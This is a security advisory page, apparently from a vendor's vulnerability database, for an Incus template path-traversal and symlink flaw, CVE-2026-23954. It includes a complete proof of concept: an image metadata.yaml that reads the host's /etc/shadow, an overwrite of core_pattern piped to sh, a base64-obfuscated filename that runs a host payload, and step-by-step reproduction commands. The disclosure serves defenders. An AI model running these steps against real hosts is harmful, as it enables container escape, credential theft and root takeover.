Summary
A user with the ability to launch a container with a custom image (e.g a member of the ‘incus’ group) can use directory traversal or symbolic links in the templating functionality to achieve host arbitrary file read, and host arbitrary file write, ultimately resulting in arbitrary command execution on the host. This can also be exploited in IncusOS.
Details
When using an image with a metadata.yaml containing templates, both the source and target paths are not checked for symbolic links or directory traversal. [1] [2] For example, the following metadata.yaml snippet can read an arbitrary file from the host root filesystem as root, and place it inside the container:
templates:
/shadow:
when:
- start
template: ../../../../../../../../etc/shadow
Additionally, the path of the target of the template is not checked or opened safely, and can therefore contain symbolic links pointing outside the container root filesystem. For example:
templates:
/realroot/proc/sys/kernel/core_pattern:
when:
- start
template: core_pattern.tpl
Where the container root filesystem contains a symbolic link named /realroot pointing to /. This will cause the contents of the template (from the normal "templates" directory in this case) to be written to the host root filesystem as root.
This can be exploited to achieve arbitrary command execution on the host by overwriting key files. In the provided proof of concept, I am overwriting /proc/sys/kernel/core_pattern, followed by causing a crash inside the container once launched to execute arbitrary commands on the host. Many other methods are possible depending on the host operating system and configuration.
This vulnerability can be exploited by any user who can launch a new container with a custom image.
Exploiting this vulnerability on IncusOS requires a slight modification of stage2 to change to a different writable directory for the validation step (e.g /tmp). This can be confirmed with a second container with /tmp mounted from the host (A privileged action for validation only).
[1] https://github.com/lxc/incus/blob/HEAD/internal/server/instance/drivers/driver_lxc.go#L7215
[2] https://github.com/lxc/incus/blob/HEAD/internal/server/instance/drivers/driver_lxc.go#L7294
PoC
A proof of concept script for the following can be found attached, named template_arbitrary_write.sh, which will show reading of a file from the host filesystem (/etc/shadow), as well as a method for escaping from the container to achieve arbitrary command execution, which will write a file to the root filesystem (/template_arbitrary_write_cmd_exec_poc).
Manual Reproduction steps:
- Obtain and unpack a legitimate root filesystem (e.g alpine/edge) into a directory named rootfs
- Inside the unpacked root filesystem, create a symbolic link named ‘realroot’ (i.e
ln -s / rootfs/realroot) - Create a directory named “templates” alongside the rootfs directory. Include a file
core_pattern.tplcontaining|/bin/sh -c "%E" - Additionally, add files segfault.c and stage2 to the root filesystem (listed below), setting stage2 executable (
chmod +x rootfs/stage2 - Create a
metadata.yamlfor this image. Sample listed below - Create the image archive (
tar cf poc.tar *) and import into incus (incus image import poc.tar --alias poc) - Launch the newly imported image and obtain a shell (
incus launch poc poc --ephemeral; incus shell poc) - Observe that the file
/shadowinside the container contains the contents of the/etc/shadowfile from the host (host file read vulnerability) - Compile
segfault.cinto a file namedx$(echo L3Zhci9saWIvaW5jdXMvY29udGFpbmVycy8qL3Jvb3Rmcy9zdGFnZTIK|base64 -d|sh). This filename will be interpolated into the%Evalue set in thecore_patternby the host file write vulnerability, and will find and execute the stage2 binary inside the container rootfs. - Execute the compiled binary (e.g
/x*). Observe the creation of the file/template_arbitrary_write_cmd_exec_pocon the host, containing the output of 'id' showing command execution by the host root user.
segfault.c:
int main() {
int *p = 0;
*p = 42;
return 0;
}
stage2:
#!/bin/sh
id > /template_arbitrary_write_cmd_exec_poc
metadata.yaml:
architecture: x86_64
creation_date: 1
properties:
architecture: amd64
description: Exploit
os: Exploit
release: Exploit 1.0
templates:
/shadow:
when:
- start
template: ../../../../../../../../etc/shadow
/realroot/proc/sys/kernel/core_pattern:
when:
- start
template: core_pattern.tpl
Attachments
Impact
A user with the ability to launch a container with a custom image can achieve arbitrary command execution on the host.
Input manipulates file paths to reach files outside the intended directory, such as configuration or credential files. Typical impact: unauthorized file read or write outside the intended directory.
CVE-2026-23954 has a CVSS score of 8.7 (High). The vector is reachable from an adjacent network, low privileges required, and no user interaction. A CVSS score reflects the worst-case severity of the vulnerability, not your specific exposure. Whether this affects your application depends on whether the vulnerable code is present and reachable in your environment. No fixed version is listed yet, so configuration controls and monitoring matter more in the interim.
Affected versions
Security releases
Kodem intelligence
Severity tells you how bad this could be in the worst case. It does not tell you whether you are exposed. Exploitability and impact are functions of runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A vulnerable package can sit in your dependency tree and never run.
Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter. Kodem's runtime-powered SCA identifies whether this CVE is reachable in your applications.
Remediation advice
In the interim: Resolve the canonical path after applying any user-supplied input, and verify it remains within the intended directory before accessing it.
Kodem Kai can prioritize this vulnerability in your dependency tree and generate a fix recommendation.
Frequently Asked Questions
- What is CVE-2026-23954? CVE-2026-23954 is a high-severity path traversal vulnerability in github.com/lxc/incus/v6/cmd/incusd (go), affecting versions < 6.21.0. No fixed version is listed yet. Input manipulates file paths to reach files outside the intended directory, such as configuration or credential files.
- How severe is CVE-2026-23954? CVE-2026-23954 has a CVSS score of 8.7 (High). This score reflects the worst-case severity of the vulnerability, not your specific exposure. Whether it represents real risk in your environment depends on whether the vulnerable code is present and reachable.
- Which versions of github.com/lxc/incus/v6/cmd/incusd are affected by CVE-2026-23954? github.com/lxc/incus/v6/cmd/incusd (go) versions < 6.21.0 is affected.
- Is there a fix for CVE-2026-23954? No fixed version is listed for CVE-2026-23954 yet. Monitor the advisory for updates and apply mitigations in the interim.
- Is CVE-2026-23954 exploitable, and should I be worried? Whether CVE-2026-23954 is exploitable in your environment depends on whether the vulnerable code is present and reachable. A CVSS score is a worst-case rating; it does not account for your specific deployment, configuration, or usage patterns. Kodem, an Intelligent Application Security platform, uses runtime intelligence to show which vulnerabilities actually execute in production, so you can focus on the ones that represent real risk. Get a demo
- What actually determines whether CVE-2026-23954 is exploitable, and how bad it is? Exploitability and impact are not fixed properties of a CVE. They depend on runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A high CVSS score on a dependency that never runs is not the same as real risk. Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter.
- How do I fix CVE-2026-23954? No fixed version is listed yet. In the interim: Resolve the canonical path after applying any user-supplied input, and verify it remains within the intended directory before accessing it.